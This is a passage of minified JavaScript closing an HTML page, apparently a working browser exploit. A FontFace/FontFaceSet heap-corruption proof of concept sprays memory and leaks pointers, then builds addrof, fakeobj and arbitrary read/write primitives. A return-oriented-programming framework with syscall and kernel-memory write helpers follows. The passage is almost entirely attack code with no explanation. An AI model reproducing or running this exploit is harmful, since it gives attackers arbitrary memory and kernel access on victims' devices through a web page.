0x79]"]),p.write8(i.add32(8),kchain.stack),p.write8(i.add32(16),gadgets["mov rcx, [rdi] ; mov rsi, rax ; call [rcx + 0x30]"]),p.write8(r.add32(48),gadgets["mov rdi, [rax + 8] ; call [rax]"]),chain.syscall(203,a,49152)}(),e()}function poc(){for(var a=184,i=208,r=20,t=0,e=new ArrayBuffer(8),n=new Uint8Array(e),s=new Uint32Array(e),h=new Float64Array(e),o=[],c=0;c<4106;c++)o.push(new FontFace("font1","",{}));var d=new FontFace("font2","url(data:text/html,)",{});o.push(d);var p=[];for(c=0;c<512;c++)p.push(new Array(31));p[256][0]=1.5,p[257][0]={},p[258][0]=1.5;var l={a:p[256],b:new Uint32Array(1),c:!0},u={},_=1e7;function w(a){for(var i="",r=0;r<8;r++)i+=String.fromCharCode(a%256),a=(a-a%256)/256;return i}function g(a,i){void 0===i&&(i=0);for(var r=0,t=7;t>=0;t--)r=256*r+a.charCodeAt(i+t);return r}var f=[];function k(a,i){var t=i+"\0".repeat(a-r-8-i.length)+_++;return u[t]=1,f.push(t),t}var m=8594325504,v=!0,b=0,x=0;window.ffses={};do{var S=w(22);for(c=0;c<20;c++)S+=w(m+16384*c);S+=w(t);for(c=0;c<256;c++)k(i,S);ffses["search_"+ ++x]=new FontFaceSet(o);var y=k(i,S),E=null,F=null;for(c=0;c<4106;c++)if(o[c].family="search"+x,y.substr(0,S.length)!=S){E=c;var A=y.substr(0,S.length);for(c=1;c<=20;c++)if(A.substr(8*c,8)!=S.substr(8*c,8)){F=g(S.substr(8*c,8));break}0==b++&&(m=F+32768,F=null);break}(v=!v)&&(m+=327680)}while(null===F);S="";S+=w(26),S+=w(F),S+=w(F+a);for(c=0;c<19;c++)S+=w(t);for(c=0;c<256;c++)k(i,S);var K=[];for(c=0;;c++){ffses["ffs_leak_"+c]=new FontFaceSet([o[E],o[E+1],d]);var T=k(i,S);K.push(k(i,S)),o[E].family="evil2",o[E+1].family="evil3";var R=g(T.substr(T.length-8));if(R<281474976710656)break}function B(r,e){var n="";n+="0000",n+="ÿ\0\0\0ÿÿÿÿ",n+=w(r),n+=w(2147483668),S="",S+=w(29),S+=w(F),S+=w(F+a),S+=w(F+2*a);for(var s=0;s<18;s++)S+=w(t);for(s=0;s<256;s++)k(i,S);ffses[e]=new FontFaceSet([o[E],o[E+1],o[E+2],d]);k(i,S);var h=k(i,n);return o[E].family=e+"_evil1",o[E+1].family=e+"_evil2",o[E+2].family=e+"_evil3",K.push(h),h.length<1e3?B(r,e+"_"):h}var O=B(R,"ffs3");for(c=0;c<1e5;c++)k(128,"");var j=[];for(c=0;c<65536;c++)j.push({value:1094927426}),j.push({value:l});for(var L=null;null===L;){Object.defineProperties({},j);for(c=0;;c++)if(66==O.charCodeAt(c)&&68==O.charCodeAt(c+1)&&67==O.charCodeAt(c+2)&&65==O.charCodeAt(c+3)&&0==O.charCodeAt(c+4)&&0==O.charCodeAt(c+5)&&254==O.charCodeAt(c+6)&&255==O.charCodeAt(c+7)&&14==O.charCodeAt(c+24)){L=g(O,c+32);break}}var C=B(L,"ffs4"),W=g(C,16),P=g(C,24),U=g(B(W,"ffs5"),8),N=B(P,"ffs6");for(c=0;c<8;c++)n[c]=N.charCodeAt(c);var z=s[0],I=s[1];s[0]=65536,s[1]=0,p[257][1]={},p[257][0]=h[0],s[0]=F+12*a|0,s[1]=(F-F%4294967296)/4294967296,p[256][c]=h[0],pp_s="",pp_s+=w(56);for(c=0;c<12;c++)pp_s+=w(F+c*a);var V="";V+="0000",V+=w(t),V+=w(U),V+='\0\0\0\0"\0\0\0';var D=[];for(c=0;c<12;c++)D.push(o[E+c]);D.push(d);var q=[o[E+12]];for(c=0;c<5;c++)q.push(new FontFace("font8","url(data:text/html,)",{}));for(c=0;c<700;c++)k(i,pp_s);ffses.ffs7=new FontFaceSet(D),k(i,pp_s),ffses.ffs8=new FontFaceSet(q);var $=k(i,V);K.push($);for(c=0;c<13;c++)o[E+c].family="hammer"+c;function G(a){return p[257][32]=a,h[0]=p[258][0],4294967296*s[1]+s[0]}var M=new Uint32Array(8),Y=new Uint8Array(1),H=new Uint32Array(8),J={obj:null},Q=G(Y),X=G(J);s[0]=z,s[1]=I,n[6]=7;var Z,aa,ia={jscell:h[0],butterfly:!0,buffer:M,size:22136};function ra(a,i){i[4]=0|a,i[5]=a/4294967296|0}function ta(a,i){ra(a,M),M[6]=i}window.addrof=function(a){return J.obj=a,(i=H)[4]+4294967296*i[5];var i},window.fakeobj=function(a){return ra(a,H),J.obj},window.read_mem=function(a,i){ta(a,i);for(var r=[],t=0;t<i;t++)r.push(Y[t]);return r},window.write_mem=function(a,i){ta(a,i.length);for(var r=0;r<i.length;r++)Y[r]=i[r]},window.read_ptr_at=function(a){for(var i=0,r=read_mem(a,8),t=7;t>=0;t--)i=256*i+r[t];return i},window.write_ptr_at=function(a,i){for(var r=[],t=0;t<8;t++)r.push(255&i),i/=256;write_mem(a,r)},Z=G(ia)+16,s[0]=Z,s[1]=(Z-Z%4294967296)/4294967296,p[258][0]=h[0],(aa=p[257][32])[4]=Q,aa[5]=(Q-Q%4294967296)/4294967296,ia.buffer=H,aa[4]=X,aa[5]=(X-X%4294967296)/4294967296,aa=null,function(){var a=read_ptr_at(addrof($)+8)-208;write_mem(a,read_mem(a-96,208));for(var r=0;r<K.length;r++){var t=read_ptr_at(addrof(K[r])+8);write_ptr_at(t,4294967296*(i-20)+1),write_ptr_at(t+8,t+20),write_ptr_at(t+16,2147483668)}write_ptr_at(U+248,133143986207)}();var ea=new Uint32Array(8),na=new Uint32Array(2),sa=addrof(na),ha=fakeobj(addrof(ia)+16);ia.buffer=na,ha[7]=1,ia.buffer=ea,ha[4]=sa,ha[5]=(sa-sa%4294967296)/4294967296,ha[7]=1;var oa={write8:function(a,i){ea[4]=a.low,ea[5]=a.hi,i instanceof int64?(na[0]=i.low,na[1]=i.hi):(na[0]=i,na[1]=0)},write4:function(a,i){ea[4]=a.low,ea[5]=a.hi,na[0]=i instanceof int64?i.low:i},write2:function(a,i){ea[4]=a.low,ea[5]=a.hi;var r=4294901760&na[0];na[0]=i instanceof int64?65535&i.low|r:65535&i|r},write1:function(a,i){ea[4]=a.low,ea[5]=a.hi;var r=4294967040&na[0];na[0]=i instanceof int64?255&i.low|r:255&i|r},read8:function(a){return ea[4]=a.low,ea[5]=a.hi,new int64(na[0],na[1])},read4:function(a){return ea[4]=a.low,ea[5]=a.hi,na[0]},read2:function(a){return ea[4]=a.low,ea[5]=a.hi,65535&na[0]},read1:function(a){return ea[4]=a.low,ea[5]=a.hi,255&na[0]},leakval:function(a){return J.obj=a,new int64(H[4],H[5])}};window.p=oa,run_hax()}window.rop=function(){return this.stackback=p.malloc32(65544),this.stack=this.stackback.add32(65536),this.stack_array=this.stackback.backing,this.retval=this.stackback.add32(262144),this.count=1,this.branches_count=0,this.branches_rsps=p.malloc(512),this.clear=function(){this.count=1,this.branches_count=0;for(var a=1;a<49152;a++)this.stack_array[a+16384]=0},this.pushSymbolic=function(){return this.count++,this.count-1},this.finalizeSymbolic=function(a,i){i instanceof int64?(this.stack_array[16384+2*a]=i.low,this.stack_array[16384+2*a+1]=i.hi):(this.stack_array[16384+2*a]=i,this.stack_array[16384+2*a+1]=0)},this.push=function(a){this.finalizeSymbolic(this.pushSymbolic(),a)},this.push_write8=function(a,i){this.push(gadgets["pop rdi"]),this.push(a),this.push(gadgets["pop rsi"]),this.push(i),this.push(gadgets["mov [rdi], rsi"])},this.fcall=function(a,i,r,t,e,n,s){return null!=i&&(this.push(gadgets["pop rdi"]),this.push(i)),null!=r&&(this.push(gadgets["pop rsi"]),this.push(r)),null!=t&&(this.push(gadgets["pop rdx"]),this.push(t)),null!=e&&(this.push(gadgets["pop rcx"]),this.push(e)),null!=n&&(this.push(gadgets["pop r8"]),this.push(n)),null!=s&&(this.push(gadgets["pop r9"]),this.push(s)),8&this.stack.add32(8*this.count).low&&this.push(gadgets.ret),this.push(a),this},this.call=function(a,i,r,t,e,n,s){return this.fcall(a,i,r,t,e,n,s),this.write_result(this.retval),this.run(),p.read8(this.retval)},this.syscall=function(a,i,r,t,e,n,s){return this.call(window.syscalls[a],i,r,t,e,n,s)},this.get_rsp=function(){return this.stack.add32(8*this.count)},this.write_result=function(a){this.push(gadgets["pop rdi"]),this.push(a),this.push(gadgets["mov [rdi], rax"])},this.write_result4=function(a){this.push(gadgets["pop rdi"]),this.push(a),this.push(gadgets["mov [rdi], eax"])},this.jmp_rsp=function(a){this.push(window.gadgets["pop rsp"]),this.push(a)},this.run=function(){p.launch_chain(this),this.clear()},this.KERNEL_BASE_PTR_VAR,this.set_kernel_var=function(a){this.KERNEL_BASE_PTR_VAR=a},this.rax_kernel=function(a){this.push(gadgets["pop rax"]),this.push(this.KERNEL_BASE_PTR_VAR),this.push(gadgets["mov rax, [rax]"]),this.push(gadgets["pop rsi"]),this.push(a),this.push(gadgets["add rax, rsi"])},this.write_kernel_addr_to_chain_later=function(a){this.push(gadgets["pop rdi"]);var i=this.pushSymbolic();return this.rax_kernel(a),this.push(gadgets["mov [rdi], rax"]),i},this.kwrite8=function(a,i){this.rax_kernel(a),this.push(gadgets["pop rsi"]),this.push(i),this.push(gadgets["mov [rax], rsi"])},this.kwrite4=function(a,i){this.rax_kernel(a),this.push(gadgets["pop rdx"]),this.push(i),this.push(gadgets["mov [rax], edx"])},this.kwrite2=function(a,i){this.rax_kernel(a),this.push(gadgets["pop rcx"]),this.push(i),this.push(gadgets["mov [rax], cx"])},this.kwrite1=function(a,i){this.rax_kernel(a),this.push(gadgets["pop rcx"]),this.push(i),this.push(gadgets["mov [rax], cl"])},this.kwrite8_kaddr=function(a,i){this.rax_kernel(i),this.push(gadgets["mov rdx, rax"]),this.rax_kernel(a),this.push(gadgets["mov [rax], rdx"])},this};
</script>

</body>

</html>